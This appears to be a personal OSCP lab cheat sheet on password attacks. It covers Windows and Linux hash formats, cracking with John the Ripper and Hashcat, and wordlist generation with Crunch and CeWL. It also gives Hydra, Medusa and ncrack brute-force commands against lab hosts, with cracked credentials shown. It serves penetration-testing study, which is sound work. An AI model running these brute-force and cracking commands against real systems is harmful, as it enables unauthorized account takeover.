PASSWORDS
Passwords

https://cracker.offensive-security.com
https://cirt.net/passwords


Attack Vectors
=================================================================
PASSWORD SPRAY - USE TOP PASSWORDS AGAINST MULTIPLE USERNAMES
CREDENTIALS LEAK - GET A COPY OF THE PASSWORD FROM SOMEWHERE ELSE...PEOPLE TEND TO RECYCLE PASSWORDS
DEFAULT PASSWORDS....
BRUTE FORCE HASHING - CAPTURE THE MD5 / NTLM  SHA1 AND TRY TO REVERSE IT....CHECK HAVEBEENPWN SITE
BRUTE FORCE ONLINE - LOGIN, AUTHENTICATION ATTEMPT JUST GUESSING...
PHISHING - SEND A MALICIUS EMAIL AND SOMEONE WILL CLICK IT
PHYSICAL DUMP - CHECK BLOCKNOTES, PAPERS, ANYTHING WHERE A PASSWORD MIGHT HAVE BEEN WRITTEN
DIGITAL DUMP - CHECK FILES, DUMP MEMORY


WINDOWS CREDENTIALS
=================================================================
LAN Manager (LM)
- Example: F1F7ADA0FE4A2881AAD3B435B51404EE
- Hash length should be 32 bytes
- Used as default on older Windows environments (Off by default on Windows Vista/Server 2008)
- Case-insensitive
- Maximum password length: 142
you can Pass-The-Has with NTLM

Both LM and NTLM hashes
- PwDump format: LM:NTLM
- ...or: User:ID:LM:NTLM:::
- Example: F1F7ADA0FE4A2881AAD3B435B51404EE:FF94686ED6EC5222AB70C90D82A8E853
- Hash length should be 65 bytes
- Can be used to obtain the correct case for the password
you cannot Pass-The_has with Net-NTLM (v2)

WINDOWS HASH EXAMPLES

=================================================================
Administrator:500:aad3b435b51404eeaad3b435b51404ee:08ed1e955a2f78625b675c2467cba1c2:::
ACCOUNT NAME : ACCOUNT ID : LM HASH : NT HASH

==================================================================

LINUX HASH EXAMPLES

=================================================================
PASSWD File
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin

SHADOW File
root:$1$uF5XC.Im$8k0Gkw4wYaZkNzuOuySIx/:16902:0:99999:7:::
vcsa:!!:15422:0:99999:7:::
pcap:!!:15422:0:99999:7:::
ntp:!!:15422:0:99999:7:::
cyrus:!!:15422:0:99999:7:::

UNSHADOWING FOR CRACKING
root@k:~/Documents/myhacks/new_oscp# unshadow passwd_file shadow_file
Created directory: /root/.john
root:$1$uF5XC.Im$8k0Gkw4wYaZkNzuOuySIx/:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin


JOHN THE RIPPER
==================================================================
john filecontaininghashes.txt
/etc/john/john.conf --> john the ripper config file


root@k:~/Documents/oscp_cert# john --format=LM list_up_sorted 
Using default input encoding: UTF-8
Using default target encoding: CP850
Loaded 38 password hashes with no different salts (LM [DES 128/128 AVX-16])
Press 'q' or Ctrl-C to abort, almost any other key for status
MARK             (mark:2)
BACKUPD          (backup:1)
...
...
...


root@k:~/Documents/oscp_cert# john --format=LM list_up_sorted --show
admin::1004:aad3b435b51404eeaad3b435b51404ee:7a88f1e3c4aea37cae88cd8febd5c844:::
Administrator::500:aad3b435b51404eeaad3b435b51404ee:08ed1e955a2f78625b675c2467cba1c2:::
Administrator::500:aad3b435b51404eeaad3b435b51404ee:175a592f3b0c0c5f02fad40c51412d3a:::
Administrator::500:aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7:::
alison::1005:aad3b435b51404eeaad3b435b51404ee:10d0ba70f95b81b77373fe89d02650b8:::
backup:BACKUPDISKS:1006:d043063e38d7ea968b1c09d630094d48:6ac617d1b943edaf3d64cd98da379438:::
david:DAVID1973:1007:f671583503e19591c912c0626f0bd172:33aafea341b5a134c91dcd5a5aa33e9d:::
Guest::501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
USER : ID : PW : HASHES

then you can insert that data into 2 files and run hydra over the whole network


HYDRA
===================================================================
root@k:~/Documents/oscp_cert# hydra -L usernames_smb -P passwords_smb 10.11.1.5 smb
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2019-01-18 00:49:53
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
[DATA] max 1 task per 1 server, overall 1 task, 676 login tries (l:26/p:26), ~676 tries per task
[DATA] attacking smb://10.11.1.5:445/
[STATUS] 1.00 tries/min, 1 tries in 00:01h, 675 to do in 11:16h, 1 active
[445][smb] host: 10.11.1.5   login: MARK   password: mark
[STATUS] 9.00 tries/min, 27 tries in 00:03h, 649 to do in 01:13h, 1 active


cat list_of_targets | while read line; do hydra -L usernames_smb -P passwords_smb $line smb > hydra_$line; done


WORDLIST LOCATION
=====================================================================
root@KK:~# ls /usr/share/wordlists/
dirb       dnsmap.txt     fern-wifi   nmap.lst        sqlmap.txt
dirbuster  fasttrack.txt  metasploit  rockyou.txt.gz  wfuzz
root@KK:~# 
=====================================================================


Crunch -> Wordlist generator

======================================================================
crunch 6 6 0123456789ABCEF ----> generates a list of words which are 6 characters long containing any of the characters 0123456789ABCDEF
crunch 6 6 0123456789ABCEF -o list.txt ----> it saves the wordlist on a text file
=======================================================================

/usr/share/crunch/charset.lst --> Set of charactesrs

=======================================================================
Tool for dumping windows hashes
It has to be copied on the target windows machine and executed with admin priviledges
fgdump, wce, psexec

=======================================================================

pth for logging/executing remote commands with hashes instead of passwords

=======================================================================

cewl www.megacorpone.com -m 6 -w /root/wordlist.xt  ---> generates a list of words based on patterns from a website

=======================================================================

MEDUSA
=======================================================================
medusa -h x.x.x.x -u Admin -p Mypasswordlist.txt 
=======================================================================

ncrack for RDP Protocol
=======================================================================
ncrack -v -f --user Admin -P mypasswordlist.txt rdp:x.x.x.x,CL=1
=======================================================================

HASHCAT
=======================================================================
root@k:~/Documents/myhacks/new_oscp# hashcat -m 500 -a 0 -o cracked.txt hash.txt /usr/share/wordlists/fasttrack.txt 
hashcat (v5.1.0) starting...

Set the hash type to md5unix - standard attack - ouput to file - source file - wordlist



